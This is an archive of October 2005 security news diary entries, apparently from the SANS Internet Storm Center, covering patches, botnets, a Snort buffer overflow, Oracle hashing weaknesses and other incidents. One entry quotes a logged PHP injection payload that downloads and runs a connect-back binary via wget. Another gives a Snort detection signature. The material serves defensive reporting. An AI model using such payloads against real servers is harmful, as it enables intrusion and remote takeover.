Published: 2005-10-31

Safemode rootkit & DRM

A news fwiw, there is a great analysis and commentary on a  rootkit made to run in safemode today at Mark's Sysinternals Blog today. Thanks very much for the great rootkit detection work and writing Mark!

F-Secure is also covering this in their blog.


Published: 2005-10-31

PHP and phpBB releases

We usually do not add news about software releases , but these two are kind of very important ones.
The first is about the new release of phpBB. This bulleting board system is very common and was target of some perl bots some time ago, due a vulnerability on its code. So, it is very important to keep up-to-date with the vendor.
The second one is the PHP itself. They just released a new version 4.4.1 and I would suggest you to keep up-to-date on this one too...

Today we received a post about some apache log entries regarding attempts to explore vulnerabilities on another php application, called xmlrpc.php. The entry was this one:

POST /wordpress/xmlrpc.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: text/xml

<value><name>',''));echo '_begin_';echo `cd /tmp;wget xxx.xxx.255.44/cback;chmod +x cback;./cback xxx.xxx.227.194 8080`;echo '_end_';exit;/*</name></value></param></params></methodCall>

This looks like they were targeting a vulnerability on xmlrpc.php. And according their website the new releases fixes some security vulnerabilties."Note: all users are encouraged to upgarde to release 1.2 or later,since known exploits exist for earlier versions.All use of eval as a potential remote code execution exploit has been removed in release 1.2. More info on the vulnerabilities can be found at the bottom of the page."
Pedro Bueno ( pbueno //%// isc. sans. org)


Published: 2005-10-31

Leap second: when time stands still

Just after we in the US changed our clocks back an hour from daylight saving time to standard time I ran across an interesting tid-bit regarding time. This may have impacts across many information systems.
                      UTC TIME STEP
on the 1st of January 2006

A positive leap second will be introduced at the end of December 2005.
The sequence of dates of the UTC second markers will be:

2005 December 31, 23h 59m 59s
2005 December 31, 23h 59m 60s
2006 January 1, 0h 0m 0s

see: http://hpiers.obspm.fr/iers/bul/bulc/bulletinc.dat

This is being done to keep time in sync with the slowing earth's rotation and the standard time measures in use in atomic clocks. There have been several leap seconds introduced since 1972.

My original source for this information is the November 2005 Scientific American article by Wendy Grossman.  The impacts on information systems can come from GPS clocks not recognizing the leap second and sending out flawed or inaccurate data with can affect many time based functions including security features.  According to the article there is talk within the INTERNATIONAL EARTH ROTATION AND REFERENCE SYSTEMS SERVICE (IERS) (a United Nations organization) of decoupling standard time measurement from the earth's rotation and adhering strictly to atomic decay.

NTP systems appear to be able to handle leap seconds: http://www.eecis.udel.edu/~mills/leap.html

Scientific American article here.

Happy travels through time ...
Dan Goldberg
Dan at madjic dot net


Published: 2005-10-31

(Another) AOL Pwstealer

Just a quick note about (another) one password stealer that we received today, focused on AOL. This one is not detected by any AV on Virustotal yet, althougth after I sent it to my personal AV list, some already answered that it will be included in the next signature's release.
This one had the  name of new_pict.exe , maybe trying to fool the person to click on an attachment file.

If you run this file you will get this screen asking for a screen name and password.

Pedro Bueno ( pbueno //%// isc. sans. org)


Published: 2005-10-31

Email From Beyond - Tell us your own Halloween stories

I'll start the Halloween ball rolling with a story of my own...  Send along your own tale of Internet strangeness, and around Midnight (GMT), I'll post some of the best...

I had known him for about 10 years when he died, too young, too soon.  He was the President of our local School Board, I was the Vice President.  We worked closely together on all of the topics and issues that face a School Board over the years.  Even through the times when the cancer made it difficult for him to go on.  He was that kind of man.

His name was John, and he was more than just my collegue... he was my friend.

He was also what I would call a computer nerd wannabe.  He loved geneology and created incredibly detailed databases of his own designing.  He was a sucker for the latest and greatest technology gizmos, and always had newer and cooler toys than me.  But when things got beyond the world of his pre-packaged software, he was out of his depth.  That's when I'd get a call.

I pulled more than a few viruses off of his machine, always leaving him with a gentle reminder about safe computer practices.  But I could never get frustrated with him.  The differences in our ages placed him squarely in the generation before me, and getting angry at him would be like getting angry at my dad... something that I just could never do.

The day that he died, I was both honored and terrified when his wife and daughter asked me to speak at his funeral.  What would I say?  How could I possibly sum up a life?

The funeral was to be in three days, and for two of those days I spent my time gathering facts about his life: his years of service at his job, his family history, his years on the School Board.  On the night before the funeral, I sat down at my laptop and stared at a blank Word document, trying to decide where to begin.

I wrote.  I wrote for about two hours, putting down a listing of accomplishments, accolades, and achieviements.  With each new item that I listed, a weight seemed to press down on me, more and more.  It just wasn't right.

Then, as I sat there looking at what I had written, the sound of a chime indicated that I had received a new email message.  I switched over to my email program and was incredibly startled to see that I had received an email message from, of all people, John.

The subject line read: "Thank you"

I flipped back over to Word, and opened a new document.  In about twenty minutes, I'd written a new eulogy with a very simple subject: "Thank you."  Thank you for all that you were.  Thank you for the difference you made.  Thank you for being you.

Although I never actually opened the email, I didn't need to look into the situation too closely to know what had happened.  One of the subject lines used by Netsky when it forged virus-laden email messages was "Thank you."

I still have that message, unopened, at the bottom of my in-box.


Published: 2005-10-31

DST Cisco Surprise

Doh!  It seems that certain Cisco IPS systems can spit up a core file and go all brain-dead within 24 hours after a transition to or from daylight-savings-time.  You'll need a COO password to view the Cisco bulletin found here.


Published: 2005-10-30

Don's Halloween Trick

The links in my diary entries are not clickable. I am trying to make a point. If you want visit the urls in question either type the url or cut and paste it into a browser. 


Published: 2005-10-30

SANS offering TREATS too.

Would you like access to next SANS Security Career survey results?
Survey: Information Security Career Advancement Survey now available.
Complete the survey by November 10 to receive a copy of the results.


Published: 2005-10-30

Sweet Treats from the Honeynet group.

The Honeynet Project and Research Alliance are pleased to announce the
release of mwcollect v3.0.0 on http://www.mwcollect.org/ .

Mwcollect is a distributed malware collector network. A mwcollect network is composed of 1 or more mwcollectd sensors; an optional database to store collected binaries and optional redirect servers that send specific ports towards the mwcollectd sensors. Mwcollectd sensors simulate vulnerable services to spreading malware and thus that malware tries to exploit these services. The mwcollectd daemon then parses the exploit packets, searches them for the shellcode, interprets the shellcode, and then takes further actions to download the malware. The malware can then be submitted into a database or stored on the local filesystem. The redirect servers act as NATTed gateways to forward specific ports to the mwcollectd servers. This provides greater IP address space coverage with fewer full-blown mwcollectd servers.

What's new?
The core has been completely rewritten. It is now even more modularized
and has proven to be very stable. Integration of libCURL for http/ftp
downloads is now threaded and therefore does not result in an increased
CPU usage. Mwcollect v3.0.0 is much more suited for future extensions
and is the important step from the proof of concept that v2.x.x was to a
real mature product. Mwcollect is now licensed under the GPL, (c) by
Honeynet Project.

Obtaining mwcollect
You can download a compressed .tar.bz2 source package from
http://download.mwcollect.org/ .


Published: 2005-10-30

Microsoft attacks Zombi Masters.

If your an average user something like 50% of the spam you get comes from an infected home computer that has been turned into a spam zombie. These spam zombie's are used by spammers to send spam without revealing their actual network address. The spammers provide the spam content to the zombies and the zombies send the spam to the victims.
From http://spamkings.oreilly.com/archives/2005/10/microsofts_decoy_zombie.html
Microsoft said it has filed "John Doe" lawsuits against the operators of 13 spam organizations that use illegal "zombie" computers to send their spam. The company held a press conference today with officials from the Federal Trade Commission to announce the lawsuits, filed in Washington State's King Country court on August 17.
From an interview with Tim Cranton http://spamkings.oreilly.com/cranton.mp3

Microsoft has taken a new approach to security in particular in the enforcement side. They took a clean computer. Infected it with a common malicious code. That code turned the computer into a Spam zombie. A Spam zombie is a computer that is connected to the Internet that has been infected and checks in with the zombie controllers to let them tell it what to do. Microsoft documented 5 Million connections used to send over 18 million Spam messages in less then 3 weeks. This was just one computer. There are reported to be thousands of Spam zombies out there. Microsoft cordoned their Spam zombie off the net so it could not be used to actually send the Spam. Microsoft filed a lawsuit and contacted ISP's to try to discover who is really sending the Spam.

The SANS news bites letter has additional information on this.


Published: 2005-10-30

Reminder: Daylight Savings Ends Sunday At 02:00

A reminder for everyone in the US that Daylight Savings ends tonight (or early tomorrow morning -- depending how late you stay up ;) ) at 02:00 AM.  Remember to set your clocks back.


Published: 2005-10-29

Incident Handling: Home Heating 101

Every winter we get suggestions, warnings, etc to have our furnaces checked out before the cold seasion to make sure they are safe to use, to ensure that they won't burn our house down while trying to heat it.  I have central AC/heat at home so the same air handler is used year round.  When its hot, the outside compressor cools the air and when its cold, the gas furnace heats the air.  The air handler has been working fine without problems until this incident.

Several days ago it finally got cold enough in Virginia to require using the furnace to heat the house so we flipped the switch on the thermostat from Cool to Heat.  The furnace worked fine and we had whole-house heat for a couple of days.  Two days ago I came home and the house was cold.  I checked the circuit breaker in the electric panel and it wasn't tripped.  I checked the light in the utility room (same circuit as the furnace) and it wouldn't come on.  Changed the light bulb -- no joy.  Flipped the circuit breaker off and back on -- no joy.  I went back upstairs to think of other ideas to try before calling an HVAC contractor when all of a sudden, a few minutes later the furnace turned on and started working just fine.

The furnace ran that evening and into the night but sometime early in the morning, it stopped working again.  I called an electrician and got someone to come out a take a look at it that afternoon.  He started with the furnace.  It seemed ok.  Tested the new light bulb -- it was good.  Tested the light socket and was suprised to get a voltage reading on the neutral wire.

So he went to the main electric panel for the house, removed the panel cover to expose the wiring connections to the circuit breakers and nuetral bars and found quite a suprise.  Instead of one neutral wire for each circuit being secured by one lockdown screw on the neutral bar, there were a number of instances of two or three wires under one screw.  In the case of the furnace circuit, there were four wires under one screw.  The screws were loose so the wires had been intermittently shorting and sparking.  Had lots of nice black soot from the arcing in there.  He was really "shocked" at the condition of the wiring in there -- no way it could have passed an inspection as it was.  He rewired the box correctly and the furnace works fine now.

So in this incident, it appeared that the problem was with the furnace since the air handler had been working fine for months cooling air and just shortly after starting to use the furnace for heat was when we had problems.  But it turned out to be an external component (the electrical circuit) that the furnace depended on.

How does this relate to information security?  Well, similar incidents can occur.  If we get alerted that a system on our network has been compromised, the first place our attention is usually directed is to the  compromised system and then perhaps the firewall to ensure to we are only allowing the appropriate access.  We may need to look elsewhere on our network to find the cause of the problem or the access vector that open.  Perhaps someone has added a wireless access point or has a dialin modem attached to a workstation.  Oftentimes we need to look beyond the immediate likely cause to look for the actual cause.

Have a safe weekend and Happy Halloween Monday night.  It looks like its supposed to be dry and cold here so I'm glad my furnace works now.

Dave Goldsmith


Published: 2005-10-29

Botnet Malware code modifier's competition continues

Trend Micro's analysis of WORM_MYTOB.KV and WORM_FANBOT.H mention some strings in the HOSTS file indicative of the ever ongoing competition between the botnet malware "modifiers", including the strings;
 "HellBot3 have BackDoor in 'HellMsn.h'. The HellBot3 author is an idiot!!!
Play with The best, Die like the rest."
Sheesh, upon reflection, the strings above make me miss Gobbles, whose flames rank right up there as all-time classics.


Published: 2005-10-29

Ethereal Advisory

In case you missed it last week, Idefense released an advisory regarding Ethereal, the very popular open source protocol analyzer. Several buffer overflow and DOS vulnerabilites are corrected with the latest release version - 0.10.13.

From http://www.ethereal.com/appnotes/enpa-sa-00021.html:
"It may be possible to make Ethereal crash, use up available memory, or run arbitrary code by injecting a purposefully malformed packet onto the wire or by convincing someone to read a malformed packet trace file."

The IDefense advisory is at: www.idefense.com/application/poi/display?id=323&type=vulnerabilities

There is exploit code for at least one of the BOF vulns. Now, who uses Ethereal, anyway? Net admins, incident handlers, auditors, analysts....nothing important to worry about on their systems, eh?

A great way to avoid getting bitten badly by these protocol parser attacks is to not run them as a super user, if you don't have to. Do your packet capturing with something dumb (like tethereal or tcpdump with the -w switch), then analyze as a non-priv user. This way an attacker is limited in the damage that can be done, should they slide the evil bits into your sniffer.


Published: 2005-10-29

Escaping the P2P-induced alert onslaught

Eric Hughes was plagued with what, at first, loked like a DOS on his system. As it turns out, he was the lucky renter of an IP address that a busy P2P net believed was a willing participant. After being pounded for days and his firewall logs busting at the seams, he opted for a new DHCP-assigned IP address. Unfortunately, many ISPs aren't terribly responsive to such requests, so he took matters into his own hands & changed his MAC address. Release & renew and bingo...no more nasty UDP trash-o-grams filling his logs.


Published: 2005-10-29

Defeating A/V by inserting forged data

Andrey Bayora (GCIH, dontja know) has released an advisory regarding an insertion-style attack to slide certain malicious content past many antivirus products. http://www.securityelf.org/magicbyteadv.html and the accompanying white paper http://www.securityelf.org/magicbyte.html describe fooling text-parsing routines by prepending executeable-looking file headers. The additional data is ignored by the victim's system, while the A/V sees it and stops evaluating the file before encountering the malicious script, code, etc. Andrey has let us know he has been contacted by some vendors, and that he is aware that Trend has issued a letter to their customers on this issue.


Published: 2005-10-27

An Assessment of the Oracle Password Hashing Algorithm

Handler Joshua Wright and Dr. Carlos Cid from the Information Security Group at the Royal Holloway, University of London have published a paper describing the inner workings and vulnerabilities in the Oracle password hashing algorithm. A copy of the paper is available through the SANS Reading Room at http://www.sans.org/rr/special/index.php?id=oracle_pass.

The authors findings indicates that the password hashing algorithm is weak, and subject to a number of attacks. If an attacker is able to obtain Oracle password hash information from a compromised system, hrough traffic sniffing, SQL injection or other attack vectors, they will likely be able to recover plaintext passwords with few resources, even when strong passwords are selected. The paper also recommendsseveral actions Oracle DBA's can take to help mitigate this threat.

The SANS Institute contacted the Oracle product security team about these findings on 7/12/2005. Subsequent requests for clarification on what Oracle plans to do to address these vulnerabilities have gone unanswered. Oracle customers are encouraged to communicate their desire to resolve these vulnerabilities through the appropriate channels.


Published: 2005-10-25

New Skype vulnerabilities

Our avid reader and contributor Juha-Matti let us know that there are two new vulnerabilities in the free IP telephone software Skype.




CVE entries: CVE-2005-3265

Secunia advisory: http://secunia.com/advisories/17305/

Please upgrade to the new version ASAP, they have been rated highly critical by Secunia, and high by Skype.

Download here: http://www.skype.com/download/

Adrien de Beaupre



Published: 2005-10-25

Exploit for Snort BO available!

So, looks like finally there is an exploit public available for the Snort BO preprocessor vulnerability.
Our good reader Juha-Matti sent a note about an exploit published by FrSIRT, formely known as K-Otik.
On the good side, our Handler Kyle Haugsness created a tool and some snort signatures that can detect them!
I just tested it against the exploit and it really works! ;-) You can find it here .

If you didnt patch yet or applied the workarounds, do you need more reasons?


Published: 2005-10-24

Is hurricane Wilma affecting you?

We've had one report about DNS resolution failures with verio.net in Boca Raton that may have been caused by hurricane Wilma. If you're aware of any other problem reports/information please let us know and it will be correlated and posted here.

We've recently received an additional report that mentioned "I've not been able to reach any of my sites hosted there since about 0830 EDT. " Thanks Fred!


Published: 2005-10-24

UDP traffic to port 50368

A reader (Bill) reported that he is seeing a substantial increase of UDP port 50368 traffic getting blocked by the firewall. The traffic appears to originate from Europe, and uses numerous source ports (but many of them are "well known").

Here a quick sample of sources and source ports

No idea what's causing that. We have almost no other traffic to this port in our database. If you see any outbound traffic like that, let us know.


Published: 2005-10-24

deja vu - "25 new unpackers added in one week"

"25 new unpackers added in one week"

Yup, that's 25 new unpackers in one week, and there's other "deja vu" data at Kaspersky.

And Websense published a whitepaper of the "JS/Wonka" encoding technique.


Published: 2005-10-24

A new botnet - Mocbot

A new botnet is making the rounds. And guess who was the first to notify us.  Our very own Handler Patrick Nolan.  He even beat our primary informant, Juha-Matti.  Way to go Patrick.

This botnet client has been spread using the MS05-047 vulnerability, continues their entry.




McAfee has information at:


This is a heads up for some since botnet owners are using it to further exploit networks they already have a presence on. If you haven't already patched - you may want to do so now.

According to McAfee and F-Secure, they have amended that this botnet is exploiting MS05-039 instead of MS05-047.


Published: 2005-10-24

Stopping Spam by Extrusion Detection

It was somewhat quiet day on the Internet today as far as the bad guys go.  We did however receive some really good emails in the mailbag with interesting tid-bits.  One that I particularly liked was one sent to us by one of our faithful readers, Chris Edwards.  He was commenting on spam filtering and included a link to an article at:

This is an excellent article by Richard Clayton, University of Cambridge in the UK.  I am very intrigued by the information that was supplied in this article.  Richard has provided some very helpful tips.  Thanks Chris for bringing this to our attention.


Published: 2005-10-24

Exploit circulating for newly patched Oracle bug

We also received an email from our very own handler Koon Yaw Tan with a link to an article at Computer World regarding an exploit circulating for the Oracle Bug.


Those of you who use Oracle may want to take a look at the article and consider getting your systems patched.



Published: 2005-10-22

Possible Problem with MS05-050 Patch

If you have manually downloaded and installed the patch for MS05-050, you may want to check again to make sure you have the correct patch. Microsoft has recently released a Knowledge Base article on "The computer may not be updated after you install the "Security Update for DirectX 7.0 for Windows 2000 (KB904706)" on a Windows 2000-based computer that is running DirectX 8 or DirectX 9".

According to the Microsoft, this only applies to:  
• You are running Microsoft Windows 2000
• Microsoft DirectX 8.0 or DirectX 9.0 is installed on the computer

This is likely due to the incorrect patch that you have manually downloaded and installed. If you have installed using Microsoft Windows Update website, you should be protected and free from this problem.

To check whether your system is correctly updated, you can verify the version number of Quartz.dll. The steps are detailed in Microsoft KB article 909596.


Published: 2005-10-22

Exploit Code for MS05-047

We have received several emails from our readers on the exploit code of MS05-047 (Microsoft Windows Plug and Play "Umpnpmgr.dll" Remote Exploit). By now I hope you have gotten all your system patch.


Published: 2005-10-21

Snort signature and standalone detection tool

(Kyle Haugsness)  As promised, here is a Snort signature to detect exploit attempts against the Back Orifice pre-processor vulnerability announced this week.  There is a fatal flaw with this signature, which will reduce its overall effectiveness when the attackers get smarter.  But I'm not going to disclose the fatal flaw.  In order to avoid the fatal flaw and detect all attacks, you will need to run the standalone program that is available here: http://handlers.sans.org/khaugsness/

Here's the Snort signature.  Don't forget to turn off the BO pre-processor in snort.conf if you are running a vulnerable version!  Also, don't forget to change the "sid" field below...

alert udp any !31337 <> any !31337 ( \
msg: "BLEEDING-EDGE EXPLOIT Snort Back Orifice pre-processor buffer overflow attempt"; \
dsize: >1024; \
content:"|ce 63 d1 d2 16 e7 13 cf|"; \
offset: 0; \
depth: 8; \
threshold: type limit, track by_dst, count 1, seconds 60; \
classtype: attempted-admin; \
sid: 3000001; \
rev:1; \


Published: 2005-10-21


There's a new variant of SDBOT making the rounds, arriving via IM as a link to a file called parishilton.scr . Those few AV that already detect it, seem to call it Sdbot.XD.  Maybe a good moment to check your proxy logs to see who of your IM users clicked on it...


Published: 2005-10-21

Outage on Verio and Level3

We are getting reports that Level3 and Verio networks are flakey or down at the moment. We'll update this entry if we get any news. 07:40 UTC: Things are slowly going back to normal. Rumour has it that a software upgrade at Level3 went awry. 


Published: 2005-10-21

Getting spamfiltered?

Every now and then, collective spam filtering efforts tend to go a bit overboard. We keep hearing of cases where static and properly assigned IP ranges of legitimate businesses erroneously got added to one of the DNSbl based public filter lists under the heading of "dynamic address".  Should this ever happen to you, chances are you won't be able to use your company email to complain about the mistake - since your email is coming from a "dynamic address" (or so the many mailgateways using the DNSbl think), it will be cheerfully ignored and discarded. Recovery from such a problem can be agonizingly slow and leave your company stranded high and dry with very limited ability to send email.  If you got a couple of spare cycles today, it might be worthwhile to go through the motions of how you would a) detect that your IP range is on some DNSbl and b) go about getting it unlisted again. A good toolkit that I like to check multiple DNSbls are the various query options available through http://openrbl.org . Another good one, suggested by ISC reader Peter Bance, is http://www.dnsstuff.com . ISC reader Bas Janssen suggests the blq Perl scripts on http://freshmeat.net/projects/blq/ for automatic monitoring of several blocklists via cron job.


Published: 2005-10-20

Big Honkin' Botnet - 1.5 Million!

A diligent reader from the Netherlands requesting anonymity (lots of folks doing that today) pointed us to this article about a recent botnet bust in the Netherlands.  The article is in Dutch, but our reader translates it thusly:

"The botnet in the spotlight by the Dutch National Criminal Investigation unit in the Netherlands, about two weeks ago was found to comprise approximately 1.5 million hacked computers (instead of 100k reported earlier) . This has been discovered by GovCert.nl, the Dutch Computer Emercency Response Team, while dismantling the network of computers infected with a Trojan Horse. Of the total number of infected computers, it was estimated that only 30,000 were located in the Netherlands.

The court of Breda has decided to keep the 19-year old suspect as well as a companion, in custody. This companion is suspected of being responsible for a so-called Denial of Service (DoS) attack after an extortion attempt of a US-based company. Earlier on in the investigation both of them were suspected of being involved in another DoS attack of a US based company.

More arrests related to this investigation are anticipated."

Woohoo!  Bad guys in jail.  You gotta love that.

From a trend perspective, I've been noting two things, which I've also heard fellow handler that I call Ekim Roop mention.  We're seeing some smaller botnets, which are more highly differentiated (that is, a single bad guy might have three or four botnets, each doing one element of a given crime.  One set of bots for spamming, another for a distributed web site for phishing, and another to obscure surfing through proxying.)  At the same time, we're also seeing some very vast botnets, this time over a million.  We may even go higher than that in the future. 

Scary stuff.  Keep fighting the good fight, dear readers.  We must.

Over and out--
--Ed Skoudis


Published: 2005-10-20

Sploits Du Jour: Veritas NetBackup & Ethereal. Watch Oracle and Snort!

Lots of new exploits today in the wild, so patch away, patch away, patch away all. 

In particular, patch Veritas NetBackup (more info here).  Working exploits have been released.

Also, patch Ethereal (more info here).  Again, working exploits are available.

Also, as we said the other day, don't forget to check out the crucial Oracle patches.

And, for goodness sakes, patch Snort or shut off the Back Orifice preprocessor!  A fully working exploit is likely very near.

Also, a kind reader emphasized the importance of hardening systems today, in light of this Snort vulnerability, mentioning the great Grsecurity package for Linux, as well as the importance of chroot environments.  Also, this reader requesting anonymity points out that the Stack-Smash-Protector (SSP) extensions for gcc from IBM makes it harder to exploit buffer overflows, and can be compiled into various executables.  It's essentially an update of the venerable StackGuard tool, but more carefully integrated with the compiler itself.  As we say in Jersey... "Noice".


Published: 2005-10-20

Fraud: Evil People Doing Evil Things

A diligent Internet Storm Center reader pointed us to this site which describes the Digital Age Fraud appearing on many credit cards.  We've had a handful of reports of people seeing fraudulent charges on their credit cards for $24.99, and this site describes some of what's happening.  We don't know the people who run this site, so be careful.  Still, they link to the Secret Service and give some very solid advice for victims of credit card fraud.


Published: 2005-10-20

Back to Green on the Snort BO Buffer Overflow

We've decided to go back to green on the Snort Back Orifice pre-processor buffer overflow vulnerability.  The reason for ratcheting down to green is primarily this: if you haven't shut off the Back Orifice preprocessor by now or come up with another work around, you probably aren't going to in the near future.  This is still a hugely important issue, but our infocon status is designed to reflect changes in the threat level.  So, we're back at green, but reserve the right to go to Yellow or higher if a worm starts to spread using this vulnerability.  From our internal deliberations, such a worm would be highly problematic.  BTW, as Kyle Haugsness pointed out last night in this article, HD Moore has recently released some piece-parts of a sploit for this flaw in Metasploit.  We're very close to full exploitation, so shut off that darn preprocessor ASAP.  Also, check with your vendors if you suspect your commercial product may have Snort code in it.  Several IDS and IPS tools do, so watch out!


Published: 2005-10-20

Snort BO status update

Here is an update regarding the Snort Back Orifice pre-processor vulnerability...(Kyle Haugsness Oct. 20 05:30 UTC)

When this vulnerability was announced yesterday, I was curious to see how difficult this would be to exploit due to the widespread nature of Snort.  After doing a little research on the encryption method in Back Orifice, I was able to develop working exploit code in 2 hours.  Bad news!!  Of course, we aren't in the business of releasing exploits, so this code is staying private.  Now, it appears that HD Moore is very close to having exploit code working as a plugin to metasploit.  If we haven't said it loudly enough already, PLEASE UPGRADE your Snort sensors or disable the BO pre-processor if running the vulnerable versions of Snort 2.4 series.  I checked the 2.3.2 source tree today and it is not vulnerable.

How about defensive measures?  If you are running Snort and are able to upgrade, then the new version should detect the exploit attempt.  But I am working on two additional defensive tools.  The first is a Snort signature that should catch the exploit attempt.  This should be available real soon now (tm).

The second tool may prove to be much more valuable.  This tool is necessary because of the fact that the exploit can be triggered on any UDP port (except 31337) and that all Back Orifice traffic is encrypted.  I don't want to give away more information at this point, since it will help the exploit writers.  The tool is a standalone program that utilizes libpcap to sniff traffic and decode UDP traffic looking for the exploit.  It will be useful to folks that can't upgrade their Snort daemon to get the new detection it provides, but still want to see if they are being attacked.  Secondly, this will be useful to people running a different IDS system that can't decode the Back Orifice encryption.  Third, it will probably be very useful in identifying a global worm outbreak. 

Since time is of the essence here, I am hoping to have this tool available very shortly.  It will require libpcap and is being developed on Debian Linux.  It will not require Snort to be running.  Since code portability isn't my strong suit, we may be looking for people to test and port the code to FreeBSD, Solaris, etc.  Please drop us an e-mail if you would be willing to help in this area.  The source code is currently about 800 lines.


Published: 2005-10-19

Oracle Critical Patch Update and Security Alert

For those that are using Oracle products - you may want to take a look at  US-CERT Technical Cyber Security Alert TA05-292A. It states that  various Oracle products and components are affected by multiple
 vulnerabilities. The impacts of these vulnerabilities include  unauthenticated, remote code execution, information disclosure, and  denial of service.

Oracle released a Critical Patch Update in October 2005 which addresses more than eighty vulnerabilities in different Oracle products and  components.

Oracle Critical Patch Update and Security Alert


Published: 2005-10-19

Infocon Yellow: Snort BO Vulnerability

After some deliberation, we feel that the Snort Back Orifice pre-processor vulnerability could become a big problem very fast. As a result, we turned the Infocon status to 'yellow'.

You have a problem if you run Snort Version 2.4 (other then 2.4.3), and if you have the  'bo' preprocessor enabled.

Why do we think this is a big deal:
  • The exploit is rather easy to write. Yes, its specific to a particular binary, but there are a number of common binaries deployed in large numbers.
  • It uses a single UDP packet, which can lead to very fast spreading worms.
  • The UDP packet can be spoofed, and can use any port combination.
  • Snort is very popular. A fast spreading (noisy) UDP worm could lead to local slowdowns/outages.
The quick fix is to disable the BO preprocessor. Please do so NOW (if you haven't already). Worry about upgrading snort later, after you have done your testing. But going through this myself, its not that hard.

Snort before version 2.4 is not vulnerable. Neither is any Snort install that does not have the bo preprocessor enabled.

Please let us know if you see exploits posted, or have other details to share. We expect to stay on 'yellow' for about 12-24 hrs unless there are any new developments.


Published: 2005-10-18

Oracle Patches

Don't forget to check out today's Oracle patches. I haven't gotten around to look at details yet, but if you run Oracle, take a look and let us know what is imporant and noteworthy.


Published: 2005-10-18

Snort BO pre-processor Vulnerability

ISS released an advisory regarding a vulnerability in Snort's Back-Orfice pre-processor. The vulnerability could be used to execute arbitrary code on the snort sensor. Also, see the advisory at snort.org for more details.

As an immediate step, disable the BO preprocessor, by commenting out this line:
# preprocessor bo

this should eliminate the issue, and these days, Back Orfice is not all that much of a threat compared to other trojan/bots. You should also consider upgrading to Snort 2.4.3, which will fix the issue.


Published: 2005-10-18

MS05-051 exploit spotted

Trend Micro reports that they spotted a POC for MS05-051 in the wild. They found it included  as a new exploit in other malware. We don't have any details yet beyond what can be found in at Trend Micro. If you find a copy of this malware, please forward it.

Trend Micro states that the malware was written in Visual Basic, which usually indicates some low skilled bot-kid. Kind of odd to see it surface this way, but having it included as a new warhead in existing malware matches past patterns.

We will update this diary as we learn more.


Published: 2005-10-17

GPL Nessus Forks

In case you have missed the announcement, Tenable security has made the decision of commercializing the popular Nessus security scanner within the next month. 

As a result, a project group has been formed to release a GPL fork of the Nessus security scanner in the future.  This product will probably undergo a name change to prevent problems with support between the commercial scanner and the new GPL fork.  In the meantime, it is located at http://www.gnessus.org/doku.php .

Additionally, Handler Kevin Liston noted that another GPL nessus project is located at http://porz-wahn.berlios.de/homepage/about.php
Scott Fendley
Handler on Duty

Published: 2005-10-17

Entertaining Bug in Microsoft Word

Earlier this afternoon, Marc Sachs found an interesting (and entertaining to me) bug in Microsoft Word.  It would seem that the synonym lookup feature does not handle certain words properly.  To try this for yourself, open your version of Microsoft Word and type the word information.  Then right click on the word, and then select the "Synonyms" menu item (see below).  You will note that the entertaining bug has given you words based on the words "in   formation" not the single word of "information".  For those wondering, this screen shot came from Microsoft Word 2003 with SP2 (11.6568.6568).  Other versions of words may or may not experience this glitch as we have not tested them.

For those thinking "Where is the security implication of this?", take this as an editorial on software complexity and its connection to security flaws.   As software has become more complex, we have seen more and more security flaws found.  Simple enough, right? To restate it a little differently, software complexity and flaws detected are directly related. This may not always stay the case, but that is common wisdom in today's world.  (Side note:  This is not a gripe against Microsoft and should not be read in that light.  This is just as relevant to any software vender.) 

In this increasingly complex software, how many flaws are there which have remained undetected for years? How many very simple oversights, like the one above, exist in more sensitive modules with security ramifications?  How long can a minor flaw stay undetected in popular software packages? 

To me, this is a very sobering thought, especially considering the number of ecommerce or medical sites on the Internet today.  Somehow, I will not let it make me loose sleep over the (in)security of my private information on the Internet.

For those that have a large amount of copious spare time, feel free to send in other single-word examples of the above to our attention. Hyphenated words are troublesome to native speakers much less computers.  If you find any words, please also submit what version of Word exhibited this issue.  We will try to find an appropriate contact within Microsoft to send the examples.


Published: 2005-10-17

Pedro's Malware Analysis Quiz

For everyone that is following along with Pedro Bueno's malware analysis quiz, here is a quick announcement.  Pedro has updated Quiz II with the answers, and has placed Quiz III up on his website for your perusal.  For those that would like to know more about what I am talking about, please check out http://handlers.dshield.org/pbueno/ for information.

Scott Fendley
Handler on Duty


Published: 2005-10-14

Possible Patch Problems

We have had a report of problems with MS05-051.  Here is what we have received.  If anyone else is experiencing problems, please let us know.

A number of people have reported weird problems with one of the MS patches released yesterday, specifically MS05-051 Vulnerabilities in MSDTC and COM+ Could Allow Remote Code Execution (902400).

Symptoms include, but are not limited to:

- Inability to visit Windows Update
- Inablility to use the Search tool off the Start Menu
- blank screen (no icons) upon login
- Symantec LiveUpdate stops working
- SpySweeper stops working
- problems with Office apps
- VirtualPC becomes extremely sluggish

Lee said he had spoken to a Microsoft engineer about this.  From what he could tell:

"this issue is only affecting people with very specific NTFS permissions. If the C:WinntRegistration folder is locked down and cannot be written to by COM+ you will have errors similar to those listed in your alert. All of those tasks use COM+ in one way or another."

Another perspective from Microsoft:

'The solution will be available at http://support.microsoft.com/?id=909444,
and will be linked to from the MS05-051 bulletin - hopefully within the
hour.  Feel free to communicate the cacls solution to anyone you come across
until then. This is not a "known issue" or "problem" with the patch, but a
"complexity with the increased security provided by the patch when running
on systems where settings have been incorrectly changed from the default

Uninstalling patch 902400 seems to do the trick for most folks.  You may need to check the "Show Updates" box under Add/Remove Programs to see the hotfixes.  The better answer is calling Microsoft directly; this should be a free call if the issue is problems with a patch.  The US number is 866-727-2338.  Outside of the US, see http://support.microsoft.com/common/international.aspx?rdpath=4 .


Published: 2005-10-14

Weekend Predictions.

Remember Zotob? In Internet-Security time, it was a long long time ago. Almost 2 months now. The Friday before Zotob hit the news we went to infocon yellow, in order to warn people about the upcoming storm.

Now this week started in a very similar way, with a large number of microsoft patches. In particular the MS DTC vulnerability (MS05-051) has a lot of promisse. Like the PnP vulnerability used for Zotob, it could target Win2k quite efficiently. At this point, the only thing missing is a widely available exploit, but given that there are a number of private/commercial exploits, a public one is probably right around the corner.

So what should you do today before you head home for the weekend:

The obvious thing is to apply patch MS05-051 on at least your Win2k systems. We do know the port 3372 scanning started in full force, likely in order to acquire target lists. If you can't patch, at least make sure port 3372 is closed. Windows 2000 does not come with its own host based firewall. But you can use IPSec policies to acchive the same effect. See this paper by David Taylor for details.

